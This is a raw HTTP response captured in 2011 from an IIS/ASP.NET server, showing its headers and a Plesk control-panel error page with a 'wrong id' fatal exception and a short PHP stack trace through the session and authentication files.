Cache-Control: post-check=0, pre-check=0,no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 23 May 2011 18:38:02 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="NON COR CURa ADMa OUR NOR UNI COM NAV STA"
X-Powered-By: ASP.NET
Date: Mon, 23 May 2011 18:38:01 GMT
Connection: close
Content-Length: 156

ERROR: PleskFatalException
wrong id

0: UserClient.php:23
   UserClient->__construct(NULL null)
1: class.Session.php:227
   Session->getUser()
2: auth.php3:296
